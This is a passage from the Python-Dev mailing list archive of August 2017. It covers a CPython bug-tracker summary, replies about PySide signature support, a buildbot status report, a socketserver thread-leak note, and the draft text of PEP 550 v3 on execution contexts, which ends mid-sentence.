buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. 
http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 Top 10 most discussed issues (10) ================================= #30871: Add test.pythoninfo http://bugs.python.org/issue30871 15 msgs #31210: Can not import modules if sys.prefix contains DELIM http://bugs.python.org/issue31210 15 msgs #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 12 msgs #31212: datetime: min date (0001-01-01 00:00:00) can't be converted to http://bugs.python.org/issue31212 10 msgs #30983: eval frame rename in pep 0523 broke gdb's python extension http://bugs.python.org/issue30983 9 msgs #5001: Remove assertion-based checking in multiprocessing http://bugs.python.org/issue5001 6 msgs #30947: Update embeded copy of libexpat from 2.2.1 to 2.2.3 http://bugs.python.org/issue30947 6 msgs #31149: Add Japanese to the language switcher http://bugs.python.org/issue31149 6 msgs #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 6 msgs #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 5 msgs Issues closed (34) ================== #18966: Threads within multiprocessing Process terminate early http://bugs.python.org/issue18966 closed by pitrou #24700: array compare is hideously slow http://bugs.python.org/issue24700 closed by pitrou #29593: Improve UnboundLocalError message for deleted names http://bugs.python.org/issue29593 closed by mbussonn #30616: Cannot use functional API to create enum with zero values http://bugs.python.org/issue30616 closed by haypo #30714: test_ssl fails with openssl 1.1.0f: test_alpn_protocols() http://bugs.python.org/issue30714 closed by christian.heimes #30721: Show expected input for right shift operator usage in custom " http://bugs.python.org/issue30721 closed by ncoghlan #30846: [3.6] test_rapid_restart() of test_multiprocessing_fork fails http://bugs.python.org/issue30846 closed by haypo #30910: Add -fexception to ppc64le build http://bugs.python.org/issue30910 closed by benjamin.peterson #31001: IDLE: Add tests for configdialog highlight tab http://bugs.python.org/issue31001 closed by terry.reedy #31002: IDLE: Add tests for configdialog keys tab http://bugs.python.org/issue31002 closed by terry.reedy #31067: test_subprocess.test_leak_fast_process_del_killed() fails rand http://bugs.python.org/issue31067 closed by haypo #31069: test_multiprocessing_spawn and test_multiprocessing_forkserver http://bugs.python.org/issue31069 closed by haypo #31129: RawConfigParser.items() is unusual in taking arguments http://bugs.python.org/issue31129 closed by gvanrossum #31142: python shell crashed while input quotes in print() http://bugs.python.org/issue31142 closed by ned.deily #31147: a suboptimal check in list_extend() http://bugs.python.org/issue31147 closed by rhettinger #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 closed by pitrou #31186: Support heapfix() and heapremove() APIs in heapq module http://bugs.python.org/issue31186 closed by rhettinger #31187: suboptimal code in Py_ReprEnter() http://bugs.python.org/issue31187 closed by serhiy.storchaka #31192: "return await coro()" SyntaxError despite being "valid syntax" http://bugs.python.org/issue31192 closed by martin.panter #31194: Inconsistent __repr__s for _collections objects http://bugs.python.org/issue31194 closed by r.david.murray #31195: Make any() and all() work with 
async generators http://bugs.python.org/issue31195 closed by brett.cannon #31198: getaddrinfo: inconsistent handling of port=None http://bugs.python.org/issue31198 closed by njs #31204: Support __fspath__ in shlex.quote http://bugs.python.org/issue31204 closed by Anthony Sottile #31205: IDLE, configdialog: Factor out KeysPage class from ConfigDialo http://bugs.python.org/issue31205 closed by terry.reedy #31208: Simplify `low_fds_to_close` in subprocess.py http://bugs.python.org/issue31208 closed by qingyunha #31214: os.walk has a bug on Windows http://bugs.python.org/issue31214 closed by r.david.murray #31216: Add ensure_ascii argument to json.tool http://bugs.python.org/issue31216 closed by r.david.murray #31219: Spam http://bugs.python.org/issue31219 closed by matrixise #31220: Spam http://bugs.python.org/issue31220 closed by matrixise #31221: Tools/scripts/patchcheck.py must ignore changes in Modules/exp http://bugs.python.org/issue31221 closed by haypo #31223: Spam http://bugs.python.org/issue31223 closed by zach.ware #31225: allow hashlib `update' to accept str http://bugs.python.org/issue31225 closed by pitrou #31228: Subprocess.Popen crash w/ Win10, debug32, bad file, and PIPE http://bugs.python.org/issue31228 closed by eryksun #31231: Travis CI mac test broken: ./python: is a directory http://bugs.python.org/issue31231 closed by haypo

From yselivanov.ml at gmail.com Fri Aug 18 12:20:20 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Fri, 18 Aug 2017 12:20:20 -0400
Subject: [Python-Dev] __signature__ for PySide ready
In-Reply-To: 
References: 
Message-ID: 

Hi Christian,

On Fri, Aug 18, 2017 at 4:41 AM, Christian Tismer wrote:
> Hi friends,
>
> in the last months, I have developed signature support for
> PySide. The module creates the same signatures as are known
> for plain Python functions.
>
> As a non-trivial addition, the module also handles multiple
> signatures as a list. I consider this extension to PySide
> as quite essential and actually more important than for Python
> itself, because type info is rather crucial for PySide.
>
> Initially, I wrote this as a pure Python 3 extension.
> Then I was "asked" to port this to Python 2 too, which was
> quite hairy to do. I'm not sure if I should have done that.
>
> Before I publish this module, I want to ask:
> --------------------------------------------
>
> Is it a bad idea to support signatures in Python 2 as well?

There's a backport of the signature API to Python 2, although last time I checked it was fairly outdated.

> Do I introduce a feature that should not exist in Python 2?
> Or is it fine to do so?
>
> Please let me know your opinion, I am happy with any result.

From brett at python.org Fri Aug 18 12:31:22 2017
From: brett at python.org (Brett Cannon)
Date: Fri, 18 Aug 2017 16:31:22 +0000
Subject: [Python-Dev] __signature__ for PySide ready
In-Reply-To: 
References: 
Message-ID: 

On Fri, 18 Aug 2017 at 02:05 Christian Tismer wrote:
> Hi friends,
>
> in the last months, I have developed signature support for
> PySide. The module creates the same signatures as are known
> for plain Python functions.
>
> As a non-trivial addition, the module also handles multiple
> signatures as a list. I consider this extension to PySide
> as quite essential and actually more important than for Python
> itself, because type info is rather crucial for PySide.
>
> Initially, I wrote this as a pure Python 3 extension.
> Then I was "asked" to port this to Python 2 too, which was
> quite hairy to do. I'm not sure if I should have done that.
>
> Before I publish this module, I want to ask:
> --------------------------------------------
>
> Is it a bad idea to support signatures in Python 2 as well?
> Do I introduce a feature that should not exist in Python 2?
> Or is it fine to do so?
>
> Please let me know your opinion, I am happy with any result.
>

If you're getting paid to do the port then I don't think it really hurts anything since it isn't going to magically open Python 2 to more usage. In fact, if you are filling in the annotation information so that type hints are being exposed, then maybe there's a chance it might help someone port to Python 3?

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From victor.stinner at gmail.com Fri Aug 18 12:36:53 2017
From: victor.stinner at gmail.com (Victor Stinner)
Date: Fri, 18 Aug 2017 18:36:53 +0200
Subject: [Python-Dev] Buildbot report, August 2017
Message-ID: 

Hi,

Here is a quick report of what changed recently on the buildbots.

== pythoninfo ==

I added a new "python3 -m test.pythoninfo" command which is now run on Travis CI, AppVeyor and the buildbots.
https://bugs.python.org/issue30871

This command dumps various pieces of information to help debug test failures on our CIs. For example, you get the Tcl version, information about the threading implementation, etc. Currently, pythoninfo is only run on the master branch, but I plan to run it on Python 3.6 and 2.7 later.

The pythoninfo idea comes from https://bugs.python.org/issue29854 where we didn't know the readline version of a buildbot, and I didn't want to put such information in the regrtest header, since importing readline has side effects.

== Removed buildbots ==

A few buildbots were removed:

* All Python 3.5 buildbots were removed, since the 3.5 branch entered the security-only stage: https://mail.python.org/pipermail/python-dev/2017-August/148794.html

* FreeBSD 9-STABLE (koobs-freebsd9): FreeBSD 9 is no longer supported upstream, use the FreeBSD 10 and FreeBSD CURRENT buildbots

* OpenIndiana: has been offline since the beginning of June. Previous discussions on this list:

  * September 2016: OpenIndiana and Solaris support https://mail.python.org/pipermail/python-dev/2016-September/146538.html

  * April 2015: MemoryError and other bugs on AMD64 OpenIndiana 3.x https://mail.python.org/pipermail/python-dev/2015-April/138967.html

  * September 2014: Sad status of Python 3.x buildbots https://mail.python.org/pipermail/python-dev/2014-September/136175.html

* intel-ubuntu-skylake: Florin Papa wrote me that the machine became unavailable in December 2016.

* Yosemite ICC buildbot (intel-yosemite-icc): it was maintained by Zachary Ware and R. David Murray. Sadly, David lost the VM image to a disk crash :-( New ICC buildbots may come back later, wait & see ;-)

* macOS Snow Leopard (murray-snowleopard): this old machine was stuck at boot for an unknown reason. "It's an old machine, and it is probably time to get rid of it." wrote R. David Murray :-)

== Reduced failure rate ==

As usual, many race conditions were fixed in tests and in the code, to reduce the buildbot failure rate. I may list them in a blog post later.

== What's Next? ==

* Buildbot should be upgraded to buildbot 0.9: https://github.com/python/buildmaster-config/pull/12

* Zachary Ware plans to rewrite our buildbot configuration during the CPython sprint (Sept 4-9)

* test_logging fails randomly on FreeBSD 10 with a warning related to threads (bpo-30830). I had been trying to reproduce the bug for 2 months, and I just identified the root bug!
https://bugs.python.org/issue31233 "socketserver.ThreadingMixIn leaks running threads after server_close()".

* The "Docs" buildbot (currently offline) may be dropped as well, https://github.com/python/buildmaster-config/pull/21

See also my previous buildbot report: https://haypo.github.io/python-buildbots-2017q2.html

Victor

From victor.stinner at gmail.com Fri Aug 18 12:40:00 2017
From: victor.stinner at gmail.com (Victor Stinner)
Date: Fri, 18 Aug 2017 18:40:00 +0200
Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes
In-Reply-To: 
References: 
Message-ID: 

2017-08-12 0:34 GMT+02:00 Ryan Smith-Roberts :
> Since ThreadingMixIn also leaks threads,
> server_close() could grow a timeout flag (following the socket module
> timeout convention) and maybe a terminate boolean. ThreadingMixIn could then
> also be fixed. I'm not sure how useful that is though, since I'd bet almost
> all users of socketserver exit the process shortly after server_close().
> Plus it can't be backported to the feature-freeze branches.

Oh. It took me 2 months, but I finally identified why *sometimes* test_logging fails with a warning about threads. It's exactly because of the weak socketserver.ThreadingMixIn, which leaves running threads in the background even after server_close().

I just opened a new issue: "socketserver.ThreadingMixIn leaks running threads after server_close()"
https://bugs.python.org/issue31233

Victor

From jelle.zijlstra at gmail.com Fri Aug 18 12:55:26 2017
From: jelle.zijlstra at gmail.com (Jelle Zijlstra)
Date: Fri, 18 Aug 2017 18:55:26 +0200
Subject: [Python-Dev] __signature__ for PySide ready
In-Reply-To: 
References: 
Message-ID: 

2017-08-18 18:20 GMT+02:00 Yury Selivanov :
> Hi Christian,
>
> On Fri, Aug 18, 2017 at 4:41 AM, Christian Tismer
> wrote:
> > Hi friends,
> >
> > in the last months, I have developed signature support for
> > PySide. The module creates the same signatures as are known
> > for plain Python functions.
> >
> > As a non-trivial addition, the module also handles multiple
> > signatures as a list. I consider this extension to PySide
> > as quite essential and actually more important than for Python
> > itself, because type info is rather crucial for PySide.
> >
> > Initially, I wrote this as a pure Python 3 extension.
> > Then I was "asked" to port this to Python 2 too, which was
> > quite hairy to do. I'm not sure if I should have done that.
> >
> > Before I publish this module, I want to ask:
> > --------------------------------------------
> >
> > Is it a bad idea to support signatures in Python 2 as well?
>
> There's a backport of the signature API to Python 2, although last time I
> checked it was fairly outdated.
>

I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2.

> > Do I introduce a feature that should not exist in Python 2?
> > Or is it fine to do so?
> >
> > Please let me know your opinion, I am happy with any result.
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/jelle.zijlstra%40gmail.com
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From yselivanov.ml at gmail.com Fri Aug 18 16:33:27 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Fri, 18 Aug 2017 16:33:27 -0400
Subject: [Python-Dev] PEP 550 v3
Message-ID: 

Hi,

This is the third iteration of the PEP.
There was some really good feedback on python-ideas and the discussion thread became hard to follow again, so I decided to update the PEP only three days after I published the previous version.

A summary of the changes can be found in the "Version History" section: https://www.python.org/dev/peps/pep-0550/#version-history

There are a few open questions left, namely the terminology and the design of the ContextKey API. On the former topic, I'm quite happy with the latest version: Execution Context, Logical Context, and Context Key.

Thank you,
Yury


PEP: 550
Title: Execution Context
Version: $Revision$
Last-Modified: $Date$
Author: Yury Selivanov
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 11-Aug-2017
Python-Version: 3.7
Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017


Abstract
========

This PEP proposes a new mechanism to manage execution state--the logical environment in which a function, a thread, a generator, or a coroutine executes.

A few examples of where having reliable state storage is required:

* Context managers like decimal contexts, ``numpy.errstate``, and ``warnings.catch_warnings``;

* Storing request-related data such as security tokens and request data in web applications, implementing i18n;

* Profiling, tracing, and logging in complex and large code bases.

The usual solution for storing state is to use Thread-local Storage (TLS), implemented in the standard library as ``threading.local()``. Unfortunately, TLS does not work for the purpose of state isolation for generators or asynchronous code, because such code executes concurrently in a single thread.


Rationale
=========

Traditionally, Thread-local Storage (TLS) is used for storing the state. However, the major flaw of using TLS is that it works only for multi-threaded code. It is not possible to reliably contain the state within a generator or a coroutine. For example, consider the following generator::

    def calculate(precision, ...):
        with decimal.localcontext() as ctx:
            # Set the precision for decimal calculations
            # inside this block
            ctx.prec = precision

            yield calculate_something()
            yield calculate_something_else()

The decimal context uses TLS to store the state, and because TLS is not aware of generators, the state can leak. If a user iterates over the ``calculate()`` generator with different precisions one by one using a ``zip()`` built-in, the above code will not work correctly. For example::

    g1 = calculate(precision=100)
    g2 = calculate(precision=50)

    items = list(zip(g1, g2))

    # items[0] will be a tuple of:
    #   first value from g1 calculated with 100 precision,
    #   first value from g2 calculated with 50 precision.
    #
    # items[1] will be a tuple of:
    #   second value from g1 calculated with 50 precision (!!!),
    #   second value from g2 calculated with 50 precision.

An even scarier example would be using decimals to represent money in an async/await application: decimal calculations can suddenly lose precision in the middle of processing a request. Currently, bugs like this are extremely hard to find and fix.

Another common need for web applications is to have access to the current request object, or security context, or, simply, the request URL for logging or submitting performance tracing data::

    async def handle_http_request(request):
        context.current_http_request = request

        await ...
        # Invoke your framework code, render templates,
        # make DB queries, etc, and use the global
        # 'current_http_request' in that code.

        # This isn't currently possible to do reliably
        # in asyncio out of the box.
These examples are just a few of many where a reliable way to store context data is absolutely needed.

The inability to use TLS for asynchronous code has led to a proliferation of ad-hoc solutions, which are limited in scope and do not support all required use cases.

The current status quo is that any library, including the standard library, that uses TLS will likely not work as expected in asynchronous code or with generators (see [3]_ as an example issue.)

Some languages that have coroutines or generators recommend manually passing a ``context`` object to every function, see [1]_ describing the pattern for Go. This approach, however, has limited use for Python, where we have a huge ecosystem that was built to work with a TLS-like context. Moreover, passing the context explicitly does not work at all for libraries like ``decimal`` or ``numpy``, which use operator overloading.

The .NET runtime, which has support for async/await, has a generic solution to this problem, called ``ExecutionContext`` (see [2]_). On the surface, working with it is very similar to working with TLS, but the former explicitly supports asynchronous code.


Goals
=====

The goal of this PEP is to provide a more reliable alternative to ``threading.local()``. It should be explicitly designed to work with the Python execution model, equally supporting threads, generators, and coroutines.

An acceptable solution for Python should meet the following requirements:

* Transparent support for code executing in threads, coroutines, and generators with an easy-to-use API.

* Negligible impact on the performance of the existing code or the code that will be using the new mechanism.

* Fast C API for packages like ``decimal`` and ``numpy``.

Explicit is still better than implicit, hence the new APIs should only be used when there is no acceptable way of passing the state explicitly.


Specification
=============

Execution Context is a mechanism for storing and accessing data specific to a logical thread of execution. We consider OS threads, generators, and chains of coroutines (such as ``asyncio.Task``) to be variants of a logical thread.

In this specification, we will use the following terminology:

* **Logical Context**, or LC, is a key/value mapping that stores the context of a logical thread.

* **Execution Context**, or EC, is an OS-thread-specific dynamic stack of Logical Contexts.

* **Context Key**, or CK, is an object used to set and get values from the Execution Context.

Please note that throughout the specification we use simple pseudo-code to illustrate how the EC machinery works. The actual algorithms and data structures that we will use to implement the PEP are discussed in the `Implementation Strategy`_ section.


Context Key Object
------------------

The ``sys.new_context_key(name)`` function creates a new ``ContextKey`` object. The ``name`` parameter is a ``str`` needed to render a representation of a ``ContextKey`` object for introspection and debugging purposes.

``ContextKey`` objects have the following methods and attributes:

* ``.name``: the read-only name;

* ``.set(o)`` method: set the value to ``o`` for the context key in the execution context.

* ``.get()`` method: return the current EC value for the context key. Context keys return ``None`` when the key is missing, so the method never fails.
Below is an example of how context keys can be used::

    my_context = sys.new_context_key('my_context')
    my_context.set('spam')

    # Later, to access the value of my_context:
    print(my_context.get())


Thread State and Multi-threaded code
------------------------------------

Execution Context is implemented on top of Thread-local Storage. For every thread there is a separate stack of Logical Contexts -- mappings of ``ContextKey`` objects to their values in the LC. New threads always start with an empty EC.

For CPython::

    PyThreadState:
        execution_context: ExecutionContext([
            LogicalContext({ci1: val1, ci2: val2, ...}),
            ...
        ])

The ``ContextKey.get()`` and ``.set()`` methods are defined as follows (in pseudo-code)::

    class ContextKey:

        def get(self):
            tstate = PyThreadState_Get()

            for logical_context in reversed(tstate.execution_context):
                if self in logical_context:
                    return logical_context[self]

            return None

        def set(self, value):
            tstate = PyThreadState_Get()

            if not tstate.execution_context:
                tstate.execution_context = [LogicalContext()]

            tstate.execution_context[-1][self] = value

With the semantics defined so far, the Execution Context can already be used as an alternative to ``threading.local()``::

    def print_foo():
        print(ci.get() or 'nothing')

    ci = sys.new_context_key('ci')
    ci.set('foo')

    # Will print "foo":
    print_foo()

    # Will print "nothing":
    threading.Thread(target=print_foo).start()


Manual Context Management
-------------------------

Execution Context is generally managed by the Python interpreter, but sometimes it is desirable for the user to take control of it. A few examples of when this is needed:

* running a computation in ``concurrent.futures.ThreadPoolExecutor`` with the current EC;

* reimplementing generators with iterators (more on that later);

* managing contexts in asynchronous frameworks (implementing proper EC support in ``asyncio.Task`` and ``asyncio.loop.call_soon``.)

For these purposes we add a set of new APIs (they will be used in later sections of this specification):

* ``sys.new_logical_context()``: create an empty ``LogicalContext`` object.

* ``sys.new_execution_context()``: create an empty ``ExecutionContext`` object.

* Both ``LogicalContext`` and ``ExecutionContext`` objects are opaque to Python code, and there are no APIs to modify them.

* ``sys.get_execution_context()`` function. The function returns a copy of the current EC: an ``ExecutionContext`` instance. The runtime complexity of the actual implementation of this function can be O(1), but for the purposes of this section it is equivalent to::

      def get_execution_context():
          tstate = PyThreadState_Get()
          return copy(tstate.execution_context)

* ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)`` runs ``func(*args, **kwargs)`` in the provided execution context::

      def run_with_execution_context(ec, func, *args, **kwargs):
          tstate = PyThreadState_Get()

          old_ec = tstate.execution_context

          tstate.execution_context = ExecutionContext(
              ec.logical_contexts + [LogicalContext()]
          )

          try:
              return func(*args, **kwargs)
          finally:
              tstate.execution_context = old_ec
This allows to reuse one ``ExecutionContext`` object for multiple invocations of different functions, without them being able to affect each other's environment:: ci = sys.new_context_key('ci') ci.set('spam') def func(): print(ci.get()) ci.set('ham') ec = sys.get_execution_context() sys.run_with_execution_context(ec, func) sys.run_with_execution_context(ec, func) # Will print: # spam # spam * ``sys.run_with_logical_context(lc: LogicalContext, func, *args, **kwargs)`` runs ``func(*args, **kwargs)`` in the current execution context using the specified logical context. Any changes that ``func`` does to the logical context will be persisted in ``lc``. This behaviour is different from the ``run_with_execution_context()`` function, which always creates a new throw-away logical context. In pseudo-code:: def run_with_logical_context(lc, func, *args, **kwargs): tstate = PyThreadState_Get() old_ec = tstate.execution_context tstate.execution_context = ExecutionContext( old_ec.logical_contexts + [lc] ) try: return func(*args, **kwargs) finally: tstate.execution_context = old_ec Using the previous example:: ci = sys.new_context_key('ci') ci.set('spam') def func(): print(ci.get()) ci.set('ham') ec = sys.get_execution_context() lc = sys.new_logical_context() sys.run_with_logical_context(lc, func) sys.run_with_logical_context(lc, func) # Will print: # spam # ham As an example, let's make a subclass of ``concurrent.futures.ThreadPoolExecutor`` that preserves the execution context for scheduled functions:: class Executor(concurrent.futures.ThreadPoolExecutor): def submit(self, fn, *args, **kwargs): context = sys.get_execution_context() fn = functools.partial( sys.run_with_execution_context, context, fn, *args, **kwargs) return super().submit(fn) Generators ---------- Generators in Python are producers of data, and ``yield`` expressions are used to suspend/resume their execution. When generators suspend execution, their local state will "leak" to the outside code if they store it in a TLS or in a global variable:: local = threading.local() def gen(): old_x = local.x local.x = 'spam' try: yield ... yield finally: local.x = old_x The above code will not work as many Python users expect it to work. A simple ``next(gen())`` will set ``local.x`` to "spam" and it will never be reset back to its original value. One of the goals of this proposal is to provide a mechanism to isolate local state in generators. Generator Object Modifications ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ To achieve this, we make a small set of modifications to the generator object: * New ``__logical_context__`` attribute. This attribute is readable and writable for Python code. * When a generator object is instantiated its ``__logical_context__`` is initialized with an empty ``LogicalContext``. * Generator's ``.send()`` and ``.throw()`` methods are modified as follows (in pseudo-C):: if gen.__logical_context__ is not NULL: tstate = PyThreadState_Get() tstate.execution_context.push(gen.__logical_context__) try: # Perform the actual `Generator.send()` or # `Generator.throw()` call. return gen.send(...) finally: gen.__logical_context__ = tstate.execution_context.pop() else: # Perform the actual `Generator.send()` or # `Generator.throw()` call. return gen.send(...) If a generator has a non-NULL ``__logical_context__``, it will be pushed to the EC and, therefore, generators will use it to accumulate their local state. If a generator has no ``__logical_context__``, generators will will use whatever LC they are being run in. 
EC Semantics for Generators
^^^^^^^^^^^^^^^^^^^^^^^^^^^

Every generator object has its own Logical Context that stores only its own local modifications of the context. When a generator is being iterated, its logical context will be put on the EC stack of the current thread. This means that the generator will be able to access keys from the surrounding context (note: the original draft named the second key ``global``, which is a reserved keyword, so it is renamed here)::

    local = sys.new_context_key("local")
    global_ck = sys.new_context_key("global")

    def generator():
        local.set('inside gen:')
        while True:
            print(local.get(), global_ck.get())
            yield

    g = generator()

    local.set('hello')
    global_ck.set('spam')
    next(g)

    local.set('world')
    global_ck.set('ham')
    next(g)

    # Will print:
    #   inside gen: spam
    #   inside gen: ham

Any changes to the EC in nested generators are invisible to the outer generator::

    local = sys.new_context_key("local")

    def inner_gen():
        local.set('spam')
        yield

    def outer_gen():
        local.set('ham')
        yield from inner_gen()
        print(local.get())

    list(outer_gen())

    # Will print:
    #   ham


Running generators without LC
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

If ``__logical_context__`` is set to ``None`` for a generator, it will simply use the outer Logical Context.

The ``@contextlib.contextmanager`` decorator uses this mechanism to allow its generator to affect the EC::

    item = sys.new_context_key('item')

    @contextmanager
    def context(x):
        old = item.get()
        item.set(x)
        try:
            yield
        finally:
            item.set(old)

    with context('spam'):
        with context('ham'):
            print(1, item.get())
        print(2, item.get())

    # Will print:
    #   1 ham
    #   2 spam


Implementing Generators with Iterators
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The Execution Context API makes it possible to fully replicate the EC behaviour imposed on generators with a regular Python iterator class::

    class Gen:

        def __init__(self):
            self.logical_context = sys.new_logical_context()

        def __iter__(self):
            return self

        def __next__(self):
            return sys.run_with_logical_context(
                self.logical_context, self._next_impl)

        def _next_impl(self):
            # Actual __next__ implementation.
            ...


yield from in generator-based coroutines
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Prior to :pep:`492`, ``yield from`` was used as one of the mechanisms to implement coroutines in Python. :pep:`492` is built on top of the ``yield from`` machinery, and it is even possible to make a generator compatible with async/await code by decorating it with ``@types.coroutine`` (or ``@asyncio.coroutine``). Generators decorated with these decorators follow the Execution Context semantics described in the `EC Semantics for Coroutines`_ section below.


yield from in generators
^^^^^^^^^^^^^^^^^^^^^^^^

Another ``yield from`` use is to compose generators. Essentially, ``yield from gen()`` is a better version of ``for v in gen(): yield v`` (read more about the many subtle details in :pep:`380`.)

A crucial difference between ``await coro`` and ``yield value`` is that the former expression guarantees that the ``coro`` will be executed fully, while the latter is producing ``value`` and suspending the generator until it gets iterated again. Therefore, this proposal does not special-case the ``yield from`` expression for regular generators::

    item = sys.new_context_key('item')

    def nested():
        assert item.get() == 'outer'
        item.set('inner')
        yield

    def outer():
        item.set('outer')
        yield from nested()
        assert item.get() == 'outer'
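To make the control flow in the last example explicit, this is how it could be driven (illustrative only: it relies on the ``sys`` APIs proposed by this PEP, so it cannot run on current Python)::

    g = outer()

    # Runs outer() up to the `yield` inside nested(): the assert in
    # nested() passes because outer()'s LC is below nested()'s LC on
    # the EC stack, and nested() records 'inner' only in its own LC.
    next(g)

    # Resumes and finishes nested(); its LC (holding 'inner') is
    # discarded, so the closing assert in outer() sees 'outer' again.
    try:
        next(g)
    except StopIteration:
        pass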
An event loop is needed to schedule coroutines.  Coroutines that are
explicitly scheduled by the user are usually called Tasks.  When a
coroutine is scheduled, it can schedule other coroutines using an
``await`` expression.  In the async/await world, awaiting a coroutine
is equivalent to a regular function call in synchronous code.  Thus,
Tasks are similar to threads.

By drawing a parallel between regular multithreaded code and
async/await, it becomes apparent that any modification of the
execution context within one Task should be visible to all coroutines
scheduled within it.  Any execution context modifications, however,
must not be visible to other Tasks executing within the same OS
thread.

Similar to generators, coroutines have the new ``__logical_context__``
attribute and the same implementations of the ``.send()`` and
``.throw()`` methods.  The key difference is that coroutines start
with ``__logical_context__`` set to ``NULL`` (generators start with an
empty ``LogicalContext``.)  This means that it is expected that the
asynchronous library and its Task abstraction will control how exactly
coroutines interact with the Execution Context.


Tasks
^^^^^

In asynchronous frameworks like asyncio, coroutines are run by an
event loop, and need to be explicitly scheduled (in asyncio,
coroutines are run by ``asyncio.Task``.)

To enable correct Execution Context propagation into Tasks, the
asynchronous framework needs to assist the interpreter:

* When ``create_task`` is called, it should capture the current
  execution context with ``sys.get_execution_context()`` and save it
  on the Task object.

* The ``__logical_context__`` of the wrapped coroutine should be
  initialized to a new empty logical context.

* When the Task object runs its coroutine object, it should execute
  ``.send()`` and ``.throw()`` methods within the captured execution
  context, using the ``sys.run_with_execution_context()`` function.

For ``asyncio.Task``::

    class Task:

        def __init__(self, coro):
            ...
            self.exec_context = sys.get_execution_context()
            coro.__logical_context__ = sys.new_logical_context()

        def _step(self, val):
            ...
            sys.run_with_execution_context(
                self.exec_context, self.coro.send, val)
            ...

This makes any changes to the execution context made by nested
coroutine calls within a Task visible throughout the Task::

    ci = sys.new_context_key('ci')

    async def nested():
        ci.set('nested')

    async def main():
        ci.set('main')
        print('before:', ci.get())
        await nested()
        print('after:', ci.get())

    asyncio.get_event_loop().run_until_complete(main())

    # Will print:
    # before: main
    # after: nested

New Tasks, started within another Task, will run in the correct
execution context too::

    current_request = sys.new_context_key('current_request')

    async def child():
        print('current request:', repr(current_request.get()))

    async def handle_request(request):
        current_request.set(request)
        event_loop.create_task(child())

    run(top_coro())

    # Will print the repr of the request object, e.g.:
    # current request: <Request ...>

The above snippet will run correctly, and the ``child()`` coroutine
will be able to access the current request object through the
``current_request`` Context Key.

Any of the above examples would work if one of the coroutines were a
generator decorated with ``@asyncio.coroutine``.


Event Loop Callbacks
^^^^^^^^^^^^^^^^^^^^

Similarly to Tasks, functions like asyncio's ``loop.call_soon()``
should capture the current execution context with
``sys.get_execution_context()`` and execute callbacks within it with
``sys.run_with_execution_context()``.
This way the following code will work::

    current_request = sys.new_context_key('current_request')

    def log():
        request = current_request.get()
        print(request)

    async def request_handler(request):
        current_request.set(request)
        get_event_loop().call_soon(log)


Asynchronous Generators
-----------------------

Asynchronous Generators (AG) interact with the Execution Context
similarly to regular generators.

They have a ``__logical_context__`` attribute, which, similarly to
regular generators, can be set to ``None`` to make them use the outer
Logical Context.  This is used by the new
``contextlib.asynccontextmanager`` decorator.


Greenlets
---------

Greenlet is an alternative implementation of cooperative scheduling
for Python.  Although the greenlet package is not part of CPython,
popular frameworks like gevent rely on it, and it is important that
greenlet can be modified to support execution contexts.

In a nutshell, the greenlet design is very similar to the design of
generators.  The main difference is that for generators, the stack is
managed by the Python interpreter.  Greenlet works outside of the
Python interpreter, and manually saves some ``PyThreadState`` fields
and pushes/pops the C-stack.  Thus the ``greenlet`` package can be
easily updated to use the new low-level `C API`_ to enable full
support of EC.


New APIs
========

Python
------

The Python APIs were designed to completely hide the internal
implementation details, but at the same time provide enough control
over EC and LC to reimplement all of Python's built-in objects in pure
Python.

1. ``sys.new_context_key(name: str='...')``: create a ``ContextKey``
   object used to access/set values in EC.

2. ``ContextKey``:

   * ``.name``: read-only attribute.
   * ``.get()``: return the current value for the key.
   * ``.set(o)``: set the current value in the EC for the key.

3. ``sys.get_execution_context()``: return the current
   ``ExecutionContext``.

4. ``sys.new_execution_context()``: create a new empty
   ``ExecutionContext``.

5. ``sys.new_logical_context()``: create a new empty
   ``LogicalContext``.

6. ``sys.run_with_execution_context(ec: ExecutionContext, func,
   *args, **kwargs)``.

7. ``sys.run_with_logical_context(lc: LogicalContext, func, *args,
   **kwargs)``.


C API
-----

1. ``PyContextKey * PyContext_NewKey(char *desc)``: create a
   ``PyContextKey`` object.

2. ``PyObject * PyContext_GetKey(PyContextKey *)``: get the current
   value for the context key.

3. ``int PyContext_SetKey(PyContextKey *, PyObject *)``: set the
   current value for the context key.

4. ``PyLogicalContext * PyLogicalContext_New()``: create a new empty
   ``PyLogicalContext``.

5. ``PyExecutionContext * PyExecutionContext_New()``: create a new
   empty ``PyExecutionContext``.

6. ``PyExecutionContext * PyExecutionContext_Get()``: get the EC for
   the active thread state.

7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the
   passed EC object as the current one for the active thread state.

8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *,
   PyLogicalContext *)``: allows implementing the
   ``sys.run_with_logical_context`` Python API.


Implementation Strategy
=======================

LogicalContext is a Weak Key Mapping
------------------------------------

Using a weak key mapping for the ``LogicalContext`` implementation
enables the following properties with regards to garbage collection:

* ``ContextKey`` objects are strongly-referenced only from the
